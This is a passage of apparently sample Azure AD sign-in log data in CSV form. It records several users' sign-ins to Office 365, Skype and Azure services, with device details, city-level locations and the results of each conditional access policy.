'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:21,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",4ac82757-4f30-411f-8d68-072462842700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4ac82757-4f30-411f-8d68-072462842700,SigninLogs,Sucess,38.47222137,-77.41989899
+503,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:10.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c17fff8f-7624-4d35-b4a9-f73a10cfe659,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d86051b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,93d60bd4-ad49-40a5-9c6c-157d86051b00,SigninLogs,Sucess,50.6406517,5.572050095
+504,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,834d843c-1eae-4cab-9699-ac676b09984e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d6e061b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,93d60bd4-ad49-40a5-9c6c-157d6e061b00,SigninLogs,Sucess,50.6406517,5.572050095
+505,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:17.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,968bb09b-435e-41b8-9927-bee3ad47e663,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d7e061b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,93d60bd4-ad49-40a5-9c6c-157d7e061b00,SigninLogs,Sucess,50.6406517,5.572050095
+506,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:29.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:16,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",db55024e-3806-4afb-a208-7136d7d22200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,db55024e-3806-4afb-a208-7136d7d22200,SigninLogs,Sucess,47.47483063,-122.1431198
+507,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:15.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99109f3a-3907-4bef-ad6e-5ff0bb57b012,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d6103972-d51f-4bff-802b-f440e7de1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d6103972-d51f-4bff-802b-f440e7de1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+508,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:56.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d250c250-9dd0-45d0-a8d2-cd17ef72e4a8,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a121923-a43a-49e3-acac-67d991c31900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a121923-a43a-49e3-acac-67d991c31900,SigninLogs,Sucess,50.6406517,5.572050095
+509,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,060f9a2b-b36a-4844-92d1-57916fd29cd8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': 